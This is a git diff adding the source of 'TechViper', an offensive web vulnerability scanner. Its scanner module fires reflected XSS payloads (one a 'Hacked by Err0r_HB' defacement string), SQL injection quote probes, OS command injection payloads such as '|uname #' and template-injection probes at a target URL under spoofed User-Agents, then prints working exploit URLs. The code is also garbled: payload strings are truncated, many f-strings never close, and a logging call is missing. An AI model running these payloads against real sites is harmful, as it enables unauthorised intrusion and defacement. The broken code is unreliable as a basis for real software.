diff --git a/core/__init__.py b/core/__init__.py
new file mode 100644
index 0000000..8b13789
--- /dev/null
+++ b/core/__init__.py
@@ -0,0 +1 @@
diff --git a/core/colors.py b/core/colors.py
new file mode 100644
index 0000000..8eef4b2
--- /dev/null
+++ b/core/colors.py
@@ -0,0 +1,36 @@
+__author__ = 'Malwareman007'
+__version__ = '1.0'
+__github__ = 'https://github.com/Malwareman007/TechViper'
+__email__ = 'Malwareman007@protonmail.com'
+__blog__ = 'https://techviper.webwatcher.tech'
+import sys
+import os
+import platform
+colors = True # Output should be colored
+machine = sys.platform # Detecting the os of current system
+checkplatform = platform.platform() # Get current version of OS
+if machine.lower().startswith(('os', 'win', 'darwin', 'ios')):
+ colors = False # Colors shouldn't be displayed in mac & windows
+if checkplatform.startswith("Windows-10") and int(platform.version().split(".")[2]) >= 10586:
+ colors = True
+ os.system('') # Enables the ANSI
+if not colors:
+ end = red = white = green = yellow = run = bad = good = bold = info = que = ''
+ white = '\033[97m'
+ green = '\033[92m'
+ red = '\033[91m'
+ yellow = '\033[93m'
+ end = '\033[0m'
+ back = '\033[7;91m'
+ bold = '\033[1m'
+ blue = '\033[94m'
+ info = '\033[93m[!]\033[0m'
+ que = '\033[94m[?]\033[0m'
+ bad = '\033[91m[-]\033[0m'
+ good = '\033[92m[+]\033[0m'
+ run = '\033[97m[~]\033[0m'
+ grey = '\033[7;90m'
+ cyan='\u001B[36m'
+ gray = '\033[90m'
diff --git a/core/config.py b/core/config.py
new file mode 100644
index 0000000..7dd273d
--- /dev/null
+++ b/core/config.py
@@ -0,0 +1,7 @@
+# TechViper Config File .. |
+# HTTPS Cert
+vert = True
+# Allow Redirects
diff --git a/core/encoder.py b/core/encoder.py
new file mode 100644
index 0000000..c999f04
--- /dev/null
+++ b/core/encoder.py
@@ -0,0 +1,3 @@
+import urllib.parse
+def urlencoder(payload):
+ return urllib.parse.quote(payload,safe='')
\ No newline at end of file
diff --git a/core/logger.py b/core/logger.py
new file mode 100644
index 0000000..7fe6f25
--- /dev/null
+++ b/core/logger.py
@@ -0,0 +1,16 @@
+import logging
+import requests,urllib3
+from core.colors import *
+ format=f'{bold}[{cyan}%(asctime)s{end}{bold}]{gray}[{end}{bold}{green}%(levelname)s{gray}]{end} %(message)s',datefmt='%H:%M:%S')
+logger = logging.getLogger()
+logger.info('SQLI not found')
+logger.debug('This a Debug Message')
+logger.warning('Im Sorry i can hack this system')
+logger.error('HTTP ERROR')
+logger.critical('Internet Down')
\ No newline at end of file
diff --git a/core/reporter.py b/core/reporter.py
new file mode 100644
index 0000000..8c2b962
--- /dev/null
+++ b/core/reporter.py
@@ -0,0 +1,4 @@
+#!/usr/bin/env python
+def make_report(vuln):
+ pass
diff --git a/core/requester.py b/core/requester.py
new file mode 100644
index 0000000..c6e1032
--- /dev/null
+++ b/core/requester.py
@@ -0,0 +1,73 @@
+__author__ = 'Malwareman007'
+__version__ = '1.0'
+__github__ = 'https://github.com/Malwareman007/TechViper'
+__email__ = 'Malwareman007@protonmail.com'
+__blog__ = 'https://techviper.webwatcher.tech'
+from datetime import datetime
+from .colors import *
+from .config import *
+from .logger import logger
+from .scanner import uagent
+from time import sleep
+import requests,urllib3
+def thetime():
+ now = datetime.now()
+ return f'{bold}{blue}[{end}{bold}{now.hour}:{now.minute}:{now.second}{blue}{bold}]{end}'
+def red(w):
+ if w == 'ag':
+ return True
+ else:
+ return False
+def con(url,redir,cookie=None,timeo=None,vert=None,proxy=None,slp=0,cagent=None):
+ try:
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ logger.info(f'Check The URL')
+ r = requests.get(url,allow_redirects=redir,timeout=timeo,cookies=cookie,verify=vert,proxies=proxy,headers={'User-agent':uagent(cagent=cagent)})
+ if r.status_code == 200:
+ logger.info(f'http response : {r.status_code}')
+ elif r.status_code == 302 or r.status_code == 301:
+ logger.info(f"http response : {r.status_code} That's mean Redirect to another page/website")
+ elif r.status_code == 999:
+ logger.info('KingWaf Firwill Has been detected')
+ sleep(1)
+ else:
+ logger.info(f'http response : {r.status_code}')
+ except requests.exceptions.ConnectionError:
+ logger.error(f"host '{blue}{url}{end}' does not exist ..!")
+ exit()
+ except requests.exceptions.ReadTimeout:
+ logger.error(f"\n{bad} Timeout Error ")
+ exit()
+ except requests.exceptions.ProxyError:
+ logger.error(f"{bad} Proxy Connection Error")
+ exit()
+ except requests.exceptions.InvalidURL:
+ logger.error(f"{bad} Invalid URL")
+ exit()
+ except requests.exceptions.InvalidSchema:
+ logger.error(f"{bad} Invalid Schame")
+ exit()
+ except requests.exceptions.MissingSchema:
+ logger.error(f"{bad} Missing Schema")
+ exit()
+def con_f(url,redir,cookie=None,timeo=None,vert=None,proxy=None,cagent=None,slp=0):
+ try:
+ sleep(slp)
+ r = requests.get(url,allow_redirects=redir,timeout=timeo,verify=vert,cookies=cookie,proxies=proxy,headers={'User-agent':uagent(cagent=cagent)})
+ return 'ok'
+ except requests.exceptions.ReadTimeout:
+ return 'no','\ntimeout error ..'
+ except requests.exceptions.ConnectionError:
+ return 'no','Connection Error ..'
+ except requests.exceptions.ProxyError:
+ return 'no','Proxy Connection Error'
+ except requests.exceptions.InvalidURL:
+ return 'no','Invalid URL'
+ except requests.exceptions.InvalidSchema:
+ return 'no','Invalid Schema'
+ except requests.exceptions.MissingSchema:
+ return 'no','Missing Schema'
diff --git a/core/scanner.py b/core/scanner.py
new file mode 100644
index 0000000..27357bd
--- /dev/null
+++ b/core/scanner.py
@@ -0,0 +1,1129 @@
+#!/usr/bin/env python3
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# GNU General Public License for more details.
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+__author__ = 'Malwareman007'
+__version__ = '1.0'
+__github__ = 'https://github.com/Malwareman007/TechViper'
+__email__ = 'Malwareman007@protonmail.com'
+__blog__ = 'https://techviper.webwatcher.tech'
+import requests,sys,os,re,random,urllib3
+from .encoder import urlencoder
+from .colors import *
+from .reporter import make_report
+from time import sleep
+from .logger import logger
+all_bugs = []
+errors = {'sqlite3':'sqlite3.OperationalError','MySQL': 'error in your SQL syntax',
+ 'MiscError': 'mysql_fetch',
+ 'MiscError2': 'num_rows',
+ 'Oracle': 'ORA-01756',
+ 'JDBC_CFM': 'Error Executing Database Query',
+ 'JDBC_CFM2': 'SQLServer JDBC Driver',
+ 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server',
+ 'MSSQL_Uqm': 'Unclosed quotation mark',
+ 'MS-Access_ODBC': 'ODBC Microsoft Access Driver',
+ 'MS-Access_JETdb': 'Microsoft JET Database',
+ 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request',
+ 'unkown' : 'Server Error',
+ 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error',
+ 'Invalid Querystring' : 'Invalid Querystring',
+ 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC',
+ 'VBScript Runtime' : 'VBScript Runtime',
+ 'ADODB.Field' : 'ADODB.Field',
+ 'BOF or EOF' : 'BOF or EOF',
+ 'ADODB.Command' : 'ADODB.Command',
+ 'JET Database' : 'JET Database',
+ 'mysql_fetch_array()' : 'mysql_fetch_array()',
+ 'Syntax error' : 'Syntax error',
+ 'mysql_numrows()' : 'mysql_numrows()',
+ 'GetArray()' : 'GetArray()',
+ 'Fatal error': 'Fatal error',
+ 'FetchRow()' : 'FetchRow()',
+ 'Internal Server Error':'The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.',
+ 'Input string was not in a correct format' : 'Input string was not in a correct format',
+ 'Not found' : 'Not found','internal server':'The page cannot be displayed because an internal server error has occurred.','Internal Server Error':'The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application'}
+def uagent(payload=None,one=False,cagent=None):
+ agents=[
+ 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14',
+ 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0',
+ 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv: Gecko/20090913 Firefox/3.5.3',
+ 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv: Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
+ 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/ Chrome/16.0.912.63 Safari/535.7',
+ 'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv: Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
+ 'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv: Gecko/20090718 Firefox/3.5.1',
+ 'Opera/8.01 (Windows NT 5.1; U; pl)',
+ 'Opera/8.50 (Windows NT 5.0; U; en)',
+ 'Opera/9.00 (Macintosh; PPC Mac OS X; U; es)',
+ 'Opera/9.24 (X11; Linux i686; U; de)',
+ 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; en) Opera 8.53'
+ ]
+ if payload:
+ if cagent:
+ ag = cagent.encode('utf-8') + payload.encode('utf-8')
+ return ag
+ if one:
+ return 'Opera/9.24 (X11; Linux i686; U; de)'.encode('utf-8') + payload.encode('utf-8')
+ ag = random.choice(agents) + payload
+ return ag # Add random User-agent in request
+ if cagent:
+ return (cagent.encode('utf-8'))
+ if one:
+ return 'Opera/9.24 (X11; Linux i686; U; de)'
+ return random.choice(agents).encode('utf-8') # Add random User-agent in request
+class paramscanner: # Scanner Module
+ def __init__(slef):
+ pass
+ def xss(slef,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ logger.info('Scanning from XSS Reflected With GET Method')
+ deco = deco - 1
+ if '*' in url:
+ logger.info('relpacing (*) from url to payload')
+ logger.info('Trying to get a reflect from the parameter')
+ x = 0
+ c = requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ ch = re.findall('TechViper'.encode('utf-8'),c.content)
+ logger.info('Send http request with "TechViper" word for get a reflect')
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ check = requests.get(url.replace('*','TechViper'),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ che = re.findall('TechViper'.encode('utf-8'),check.content)
+ if len(ch) < len(che):
+ logger.info('reflect is found')
+ payloads=['"
Hacked by Err0r_HB "','"> Err0r_HB','">MOVE HERE
','">','">',' ',"'> "]
+ logger.info('Trying to get XSS from the parameter')
+ for payload in payloads:
+ payload2=urlencoder(payload)
+ for i in range(deco):
+ payload2=urlencoder(payload2)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r=requests.get(url.replace('*',payload2),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ j=url.replace('*',payload2)
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS Reflected
+{info}{bold} Payload : {payload}
+{info}{bold} Exploit : {j}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info("Not vulnerable from XSS With GET Method")
+ else:
+ pass
+ elif '*' not in url:
+ payloads=['"Hacked by Err0r_HB "','"> TechViper','">MOVE HERE
+ x = 0
+ for params in url.split("?")[1].split("&"):
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r2 = requests.get(url.replace(params, params + str('TechViper')),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r1 = requests.get(url,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ r2 = re.findall('TechViper'.encode('utf-8'),r2.content)
+ r1 = re.findall('TechViper'.encode('utf-8'),r1.content)
+ if len(r2) > len(r1):
+ logger.info('reflect is Found')
+ for payload in payloads:
+ payload2=urlencoder(payload)
+ for i in range(deco):
+ payload2=urlencoder(payload2) # encode the payload
+ sleep(slp)
+ logger.info('try to get xss from the reflect')
+ r=requests.get(url.replace(params, params + str(payload2).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ j=url.replace(params, params + str(payload2).strip())
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS Reflected
+{info}{bold} Payload : {payload}
+{info}{bold} Param : {params}
+{info}{bold} Exploit : {j}
+ x = 1
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ break
+ if x == 0:
+ logger.info("Not vulnerable from XSS With GET Method")
+ else:
+ break
+ def xss_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ ok = False
+ logger.info('Scanning from XSS With POST Method')
+ for i,d in dat.items():
+ if '*' in d:
+ ok = True
+ if ok:
+ logger.info('replacing (*) from url to payload')
+ x = 0
+ payloads=['"Hacked by Err0r_HB "','"> TechViper','">MOVE HERE
','">','">'," ","'> "]
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ logger.info('Send post request for get a HTML of page')
+ r1 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ if slp == 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ logger.info('relpacing (*) from url to payload')
+ for i,c in dat.items():
+ dat[i] = c.replace('*','TechViper')
+ logger.info('Send post request with payload for get a reflect')
+ r2 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ for i,c in dat.items():
+ dat[i] = c.replace('TechViper','*')
+ r1 = re.findall('TechViper'.encode('utf-8'),r1.content)
+ r2 = re.findall('TechViper'.encode('utf-8'),r2.content)
+ if len(r2) > len(r1):
+ logger.info('reflect is Found')
+ logger.info('Trying to get xss from the parameter')
+ for payload in payloads:
+ for i,c in dat.items():
+ dat[i] = c.replace('*',payload)
+ sleep(slp)
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS Reflected
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}
+ for i,c in dat.items():
+ dat[i] = c.replace(payload,'*')
+ x = 1
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ break
+ else:
+ for i,c in dat.items():
+ dat[i] = c.replace(payload,'*')
+ continue
+ if x == 0:
+ logger.info("Not vulnerable from XSS With GET Method")
+ else:
+ pass
+ else:
+ payloads=["'> ",'"Hacked by Err0r_HB "','"> TechViper','">MOVE HERE
+ x = 0
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r1 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ for i,c in dat.items():
+ dat[i] = c + 'TechViper'
+ logger.info('Send request with "TechViper" word for get a reflect')
+ r2 = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ for i,c in dat.items():
+ dat[i] = c.replace('TechViper','')
+ r1 = re.findall('TechViper'.encode('utf-8'),r1.content)
+ r2 = re.findall('TechViper'.encode('utf-8'),r2.content)
+ if len(r2) > len(r1):
+ logger.info('reflect is found')
+ for payload in payloads:
+ for i,c in dat.items():
+ dat[i] = c + payload
+ sleep(slp)
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ if payload.encode('utf-8') in r.content:
+ print(f"""
+{bold}{good}{bold} Bug Found : XSS Reflected
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}{bold}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}
+ for i,c in dat.items():
+ dat[i] = c.replace(payload,'')
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ else:
+ for i,c in dat.items():
+ dat[i] = c.replace(payload,'')
+ continue
+ if x == 0:
+ logger.info("Not vulnerable from XSS With GET Method")
+ def sqli_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ ok = False
+ if slp != 0:
+ logger.debug(f"Sleeping {slp} sec")
+ sleep(slp)
+ logger.info('Scanning SQLI using post method With POST Method')
+# te = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+# for c,d in errors.items():
+# fir = re.findall(d.encode('utf-8'),te.content)
+# if fir != []:
+# break
+ for i,d in dat.items():
+ if '*' in d:
+ ok = True
+ if ok:
+ payload='"'
+ logger.info("replacing (*) from url to payload")
+ for i,d in dat.items():
+ dat[i] = d.replace('*',payload)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ x = 0
+ for f,i in errors.items():
+ ch=re.findall(i.encode('utf-8'),r.content)
+ if len(ch) > 0:
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL injection
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}{bold}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'*')
+ if x == 0:
+ logger.info("Not vulnerable from SQLI With POST Method")
+ else:
+ payload='"'
+ for i,d in dat.items():
+ dat[i] = d + payload
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent)},proxies=proxy)
+ x = 0
+ for f,i in errors.items():
+ ch=re.findall(i.encode('utf-8'),r.content)
+ if len(ch) > 0:
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL injection
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'')
+ if x == 0:
+ logger.info("Not vulnerable from SQLI")
+ def osinj_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ te = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy)
+ fir = re.findall('Linux'.encode('utf-8'),te.content)
+ ok = False
+ logger.info('Scanning From RCE With POST Method')
+ for i,d in dat.items():
+ if '*' in d:
+ ok = True
+ if ok:
+ payloads=["|uname #",'"|uname #',"'|uname #"]
+ logger.info('replacing (*) from url to payload')
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ for payload in payloads:
+ for i,c in dat.items():
+ dat[i] = c.replace('*',payload)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ logger.info('sent post request with RCE payload')
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ x = 0
+ if len(ch) > len(fir):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (RCE)
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'*')
+ break
+ else:
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'*')
+ continue
+ if x == 0:
+ logger.info("Not vulnerable from RCE With POST Method")
+ else:
+ payloads=['"|uname #','|uname #',"'|uname #"]
+ for payload in payloads:
+ for i,d in dat.items():
+ dat[i] = d + payload
+ sleep(slp)
+ r = requests.post(url,data=dat,cookies=co,verify=vert,allow_redirects=redir,timeout=tim,headers={'User-agent':uagent(cagent=cagent,one=True)},proxies=proxy)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ print(f"""
+{bold}{good}{bold} Bug Found : Remote Code Execution (RCE)
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {r.url}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'')
+ break
+ else:
+ for i,d in dat.items():
+ dat[i] = d.replace(payload,'')
+ continue
+ if x == 0:
+ logger.info('Not vulnerable from RCE With POST Method')
+ def ssti_post(self,url,co,tim,dat,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ ok = False
+ logger.info('Scanning from SSTI With POST Method')
+ for i,d in dat.items():
+ if '*' in d:
+ ok = True
+ if ok:
+ logger.info('replacing (*) From url to payload')
+ x = 0
+ payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}']
+ for payload in payloads:
+ for i,c in dat.items():
+ dat[i] = c.replace('*','TechViperSSTI')
+ te = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ sleep(slp)
+ fir = re.findall('36'.encode('utf-8'),te.content)
+ for i,c in dat.items():
+ dat[i] = c.replace('TechViperSSTI',payload)
+ sleep(slp)
+ r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ print(f"""
+{bold}{good}{bold} Bug Found : Template injection (SSTI)
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {url}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ for i,d in dat.items():
+ dat[i] = i.replace(payload,'*')
+ break
+ else:
+ for i,d in dat.items():
+ dat[i] = i.replace(payload,'*')
+ continue
+ if x == 0:
+ logger.info('Not vulnerable from SSTI With POST Method')
+ else:
+ payloads=['{{6*6}}','<%= 6 * 6 %>','${6*6}']
+ x = 0
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ te = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ fir = re.findall('36'.encode('utf-8'),te.content)
+ for payload in payloads:
+ for i,c in dat.items():
+ dat[i] = c + payload
+ sleep(slp)
+ r = requests.post(url,data=dat,headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('36'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
+ print(f"""
+{bold}{good}{bold} Bug Found : Template injection (SSTI)
+{info}{bold} Payload : {payload}
+{info}{bold} Method : [{yellow}POST{end}]
+{info}{bold} VALUS : {dat}
+{info}{bold} URL : {url}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ for i,d in dat.items():
+ dat[i] = i.replace(payload,'')
+ break
+ else:
+ for i,d in dat.items():
+ dat[i] = i.replace(payload,'')
+ continue
+ if x == 0:
+ logger.info('Not vulnerable from SSTI With POST Method')
+ def sqli(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ deco = deco - 1
+ logger.info("Scanning from SQLI With GET Method")
+ payload='"'
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ if '*' in url:
+ logger.info("replacing (*) from url to payload")
+ payload='"'
+ payload=urlencoder(payload)
+ for i in range(deco):
+ payload=urlencoder(payload)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ x = 0
+ r=requests.get(url.replace('*',payload.strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ for f,i in errors.items():
+ ch=re.findall(i.encode('utf-8'),r.content)
+ if len(ch) > 0:
+ j=url.replace('*',payload.strip())
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection
+{bold}{info}{bold} Payload : "
+{info}{bold} Exploit : {j}
+{info}{bold} SQL Error : {i}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from SQLI With GET Method')
+ elif '*' not in url:
+ x = 0
+ for params in url.split("?")[1].split("&"):
+ payload='"'
+ payload=urlencoder(payload)
+ for h in range(deco):
+ payload=urlencoder(payload)
+ if slp != 0:
+ logger.debug(f'Sleeping {slp} sec')
+ sleep(slp)
+ r=requests.get(url.replace(params, params + str(payload).strip()),headers={'User-agent':uagent(cagent=cagent)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ for d,i in errors.items():
+ ch = re.findall(i.encode('utf-8'),r.content)
+ if len(ch) > 0:
+ j=url.replace(params, params + str(payload).strip())
+ print(f"""
+{bold}{good}{bold} Bug Found : SQL Injection
+{bold}{info}{bold} Payload : {payload}
+{bold}{info}{bold} Param : {params}
+{bold}{info}{bold} SQL Error : {i}
+{bold}{info}{bold} Exploit : {j}{end}
+ if batch:
+ print('\n Continue ? [Y,n] Y')
+ else:
+ cont = input('\n Continue ? [Y,n]').lower()
+ if cont != '':
+ exit()
+ elif cont != 'y':
+ exit()
+ x = 1
+ break
+ if x == 0:
+ logger.info('Not vulnerable from SQLI With GET Method')
+ def osinj(self,url,co,tim,deco,vert,redir,cagent=None,proxy=None,slp=0,batch=None):
+ logger.info('Scanning from RCE With GET Method')
+ deco = deco - 1
+ if slp != 0:
+ logger.debug(f"Sleeping {slp} sec")
+ sleep(slp)
+ te = requests.get(url,cookies=co,headers={'User-agent':uagent(cagent=cagent,one=True)},verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ fir = re.findall('Linux'.encode('utf-8'),te.content)
+ if '*' in url:
+ logger.info('replacing (*) from url to payload')
+ x = 0
+ payloads=["'|uname %23",'"|uname %23',"|uname %23"]
+ for payload in payloads:
+ for h in range(deco):
+ payload=urlencoder(payload)
+ sleep(slp)
+ r=requests.get(url.replace('*',str(payload).strip()),headers={'User-agent':uagent(cagent=cagent,one=True)},cookies=co,verify=vert,allow_redirects=redir,timeout=tim,proxies=proxy)
+ ch = re.findall('Linux'.encode('utf-8'),r.content)
+ if len(ch) > len(fir):
